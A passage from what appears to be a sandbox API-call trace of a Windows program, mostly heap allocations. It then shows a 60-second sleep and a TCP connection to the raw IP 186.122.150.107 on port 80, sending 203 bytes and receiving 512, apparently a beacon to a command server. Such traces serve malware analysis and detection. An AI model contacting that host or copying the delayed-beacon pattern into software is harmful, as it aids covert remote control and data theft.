0x27888e0 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27faa08 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27fb228 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f7f60 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f8fa0 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f8168 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f93b0 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f8578 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f91a8 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f95b8 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f97c0 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f99c8 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f9bd0 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f9dd8 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27ed0b0 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27eef28 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27ed4c0 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2804a28 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2804050 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2807380 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2804638 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x28069a8 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2806ba0 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2803c60 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2805400 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2807578 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2804e18 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2806d98 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2804248 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x28057f0 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2805be0 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2807770 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2806f90 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27bb3b0 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27bb968 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27bc4d8 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27bc6c0 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27be170 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27bbb50 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27be540 [0250.273] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27be728 [0250.274] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27bac10 [0250.274] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27badf8 [0250.274] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x28609b8 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2861ae0 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x28607d0 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2863778 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x28631c0 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2861cc8 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283d390 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283dcc8 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283f110 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283c880 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283bf48 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283c120 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283d740 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283c6a8 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283ed60 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283c4d0 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283ca58 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283e600 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283e250 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283d918 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283c2f8 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x283f2e8 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2814ce8 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2816248 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2815b28 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2816410 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2816080 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28195f0 [0250.275] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2818978 [0250.276] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x281a0a0 [0250.276] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x281ad18 [0250.276] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x281aee0 [0250.276] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28185e8 [0250.276] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2819098 [0250.276] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2819428 [0250.276] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2818090 [0250.276] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x281a268 [0250.276] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28197b8 [0250.276] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x279e5a8 [0250.276] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2869c70 [0250.276] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2869e28 [0250.276] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x286b9a8 [0250.276] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x286abe8 [0250.276] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2869ab8 [0250.276] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x286bd18 [0250.276] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2869590 [0250.276] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x286a6c0 [0250.276] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x286bb60 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x28687d0 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2868b40 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2868988 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x28693d8 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2869748 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x286af58 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28426b8 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28412d8 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2841e70 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28433f8 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28408e8 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28403f0 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2841480 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2840740 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2840c38 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2840de0 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2840f88 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2841978 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2841b20 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2842018 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28421c0 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2842368 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27a9ec8 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27aa9f0 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27a9868 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27a9a00 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27a86e0 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27aa060 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27aa1f8 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27aa390 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27aa6c0 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27ab050 [0250.277] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x286ea58 [0250.278] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x286f580 [0250.278] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x286e8c0 [0250.278] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x286dd98 [0250.278] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x286da68 [0250.278] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x286dc00 [0250.278] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2823970 [0250.278] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x281c510 [0250.278] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x281e3b0 [0250.278] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x281d2d8 [0250.278] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x281c200 [0250.278] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x281e848 [0250.278] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x281c820 [0250.278] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x281d460 [0250.278] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x281dc08 [0250.279] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x281d150 [0250.279] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x281ccb8 [0250.279] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x281ece0 [0250.279] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x281c698 [0250.279] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x281c388 [0250.279] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x281d770 [0250.279] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x281cb30 [0250.279] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x27aef30 [0250.279] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x27adc18 [0250.279] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x27add90 [0250.279] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x27ad348 [0250.279] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x27af220 [0250.279] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x27ad4c0 [0250.279] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x27af510 [0250.279] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x27ad7b0 [0250.279] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2876570 [0250.279] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2875548 [0250.279] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x28759b0 [0250.279] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2877cf0 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2875838 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2875b28 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2876280 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2877598 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c6728 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c65c0 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c6b60 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c7970 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c7c40 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c7f10 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c8078 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c9c98 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c8bb8 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27ca7d8 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27ca670 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27ca0d0 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c99c8 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c9e00 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c8e88 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27ca3a0 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280c478 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280e360 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280bf18 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280de00 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280d9f8 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280cb30 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280df58 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280e0b0 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280c880 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280d1e8 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280d498 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280db50 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280c9d8 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280e208 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280cf38 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x280d340 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27cfe28 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27d1a58 [0250.280] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27d1018 [0250.281] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27d12a8 [0250.281] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27d2870 [0250.281] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27d29b8 [0250.281] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27d2728 [0250.281] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27cc1f0 [0250.281] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27cb000 [0250.281] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27cd150 [0250.281] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27cba40 [0250.281] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27ccd78 [0250.281] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27cc710 [0250.281] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27cbf60 [0250.281] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27cc338 [0250.281] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27cc858 [0250.281] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x282a820 [0250.281] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x282a958 [0250.281] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x282b1e0 [0250.281] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x282b450 [0250.281] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2828e88 [0250.281] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x28290f8 [0250.281] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x282b6c0 [0250.281] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x282b7f8 [0250.281] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x282b930 [0250.281] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x282bba0 [0250.281] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x282b588 [0250.286] Sleep (dwMilliseconds=0xea60) [0260.292] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19cf58 | out: lpWSAData=0x19cf58) returned 0 [0260.292] socket (af=2, type=1, protocol=6) returned 0x2bc [0260.295] htons (hostshort=0x50) returned 0x5000 [0260.295] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x19cda0 | out: lpWSAData=0x19cda0) returned 0 [0260.295] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0260.297] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0260.297] inet_ntoa (in=0x6b967aba) returned="186.122.150.107" [0260.297] inet_addr (cp="186.122.150.107") returned 0x6b967aba [0260.297] connect (s=0x2bc, name=0x19d0e8*(sa_family=2, sin_port=0x50, sin_addr="186.122.150.107"), namelen=16) returned 0 [0260.554] send (s=0x2bc, buf=0x19d8f8*, len=203, flags=0) returned 203 [0260.555] recv (in: s=0x2bc, buf=0x19d4f8, len=512, flags=0 | out: buf=0x19d4f8*) returned 512 [0260.819] closesocket (s=0x2bc) returned 0 [0260.820] WSACleanup () returned 0 [0260.820] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2791730 [0260.820] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x278fd50 [0260.820] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2793338 [0260.820] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2793788 [0260.820] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2793bd8 [0260.820] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2793e00 [0260.820] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x27948c8 [0260.820] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2793560 [0260.820] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x27939b0 [0260.820] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2794028 [0260.820] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2793110 [0260.820] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2794250 [0260.820] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2794478 [0260.820] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x27946a0 [0260.820] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2792ee8 [0260.820] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28c86f8 [0260.823] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28c6028 [0260.823] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28c59b0 [0260.823] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28c6f40 [0260.823] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28c5bd8 [0260.823] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28c8b48 [0260.823] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28c6af0 [0260.823] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28c75b8 [0260.823] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28c5788 [0260.823] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28c6250 [0260.823] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28c8920 [0260.823] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28c77e0 [0260.823] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28c66a0 [0260.823] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28c6478 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28c68c8 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f3a50 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f0378 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f2c18 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f15c0 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27eff68 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f3230 [0260.824] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 